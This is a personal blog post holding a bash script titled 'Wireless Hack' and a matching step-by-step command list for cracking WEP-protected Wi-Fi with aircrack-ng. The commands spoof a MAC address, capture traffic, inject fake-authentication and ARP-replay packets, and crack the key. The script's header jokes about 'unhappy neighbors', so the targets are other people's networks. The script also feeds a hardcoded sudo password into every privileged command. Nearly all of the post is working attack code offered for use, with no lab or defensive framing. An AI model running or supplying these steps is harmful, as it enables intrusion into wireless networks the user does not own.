Albertux~# ./Blog

#!/bin/bash
#
# WARNING: USE AT YOUR OWN RISK!
#
# SIDE EFFECTS: UNHAPPY NEIGHTBORS
# 
# Author: ALbertux (Alberto Isaac Ayala Esquivias)
# Mail: <Albertux@AyalaSoft.com>
# Web: http://Albertux.AyalaSoft.com
# Script: Wireless Hack
# Tested on: Ubuntu 9.04
 
# A little trouble using gksudo gnome-terminal
# https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575
# gnome-terminal -e "sudo ...." # could be ...
# TERM=gnome-terminal
TERM=xterm
 
# A nasty function to run_like_a_root user sending the passwd
function run_like_a_root() {
sudo -S $@ << EOF
your_password
EOF
}
 
# Restore to normal: ./this_script.sh restore
if [ "$1" == "restore" ]; then
	run_like_a_root "airmon-ng stop mon0"
	run_like_a_root "/etc/init.d/networking restart"
	run_like_a_root "NetworkManager"
	exit 1
fi
 
# Set Wireless Device: ./this_script.sh wlan1
if [ -z $1 ]; then
	WDEVICE=wlan0 # Could be diferrent on your notebook
else
	WDEVICE=$1 # Set Wireless Device
fi
 
# Stop Wireless
run_like_a_root airmon-ng stop $WDEVICE
 
# Kill all fu**ing process using the Wireless Device:
run_like_a_root kill -9 `run_like_a_root airmon-ng start $WDEVICE | grep ^[1-9] | awk ' { print $1 } '`
 
# Wireless Devices Down (we need to change the Mac)
run_like_a_root ifconfig $WDEVICE down
run_like_a_root ifconfig mon0 down
 
# Fake Mac, Example:
FAKEMAC=00:66:00:66:00:66
 
# Set Fake Mac
run_like_a_root macchanger -m $FAKEMAC $WDEVICE
run_like_a_root macchanger -m $FAKEMAC mon0
 
# Up the Wireless Interface
run_like_a_root ifconfig mon0 up
 
# See all available networks
run_like_a_root $TERM -e "airodump-ng mon0" &
 
# Watch the xterm loaded and write the values (maybe you need resize xterm window)
clear
echo "Network Name: "
read ESSID
echo "Network Mac: "
read BSSID
echo "Network Channel: "
read CHANNEL
echo "Close the airodump-ng xterm and press [enter]"
read
 
# Get Data (IVs)
run_like_a_root $TERM -e "airodump-ng mon0 -w data -c $CHANNEL --bssid $BSSID" &
 
# Fake Authentication Attack
run_like_a_root $TERM -e "watch aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKEMAC mon0" &
 
# ARP Request
run_like_a_root $TERM -e "aireplay-ng -3 -b $BSSID -h $FAKEMAC mon0" &
 
# Wait some time ...
echo "Press any kay to launch aircrack-ng (30,000+ on data recommended)"
read
 
# Crack the Passwd
run_like_a_root $TERM -e "aircrack-ng data-*.cap" &
 
exit 0

sudo apt-get install aircrack-ng macchanger

sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0
sudo ifconfig wlan0 down
sudo ifconfig mon0 down
sudo macchanger -m $FAKEMAC wlan0
sudo macchanger -m $FAKEMAC mon0
sudo ifconfig mon0 up
sudo airodump-ng mon0 # See all available networks choose one channel

# terminal 01
 sudo airodump-ng mon0 -w wdata -c 6 --bssid  00:00:00:00:00:00 # -c $CHANNEL
# terminal 02
watch sudo aireplay-ng -1 0 -e $SSID -a 00:00:00:00:00:00 -h $FAKEMAC mon0
# terminal 03
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h $FAKEMAC mon0
# wait some time to get 30,000 on Data on terminal 01

sudo aircrack-ng wdata-*.cap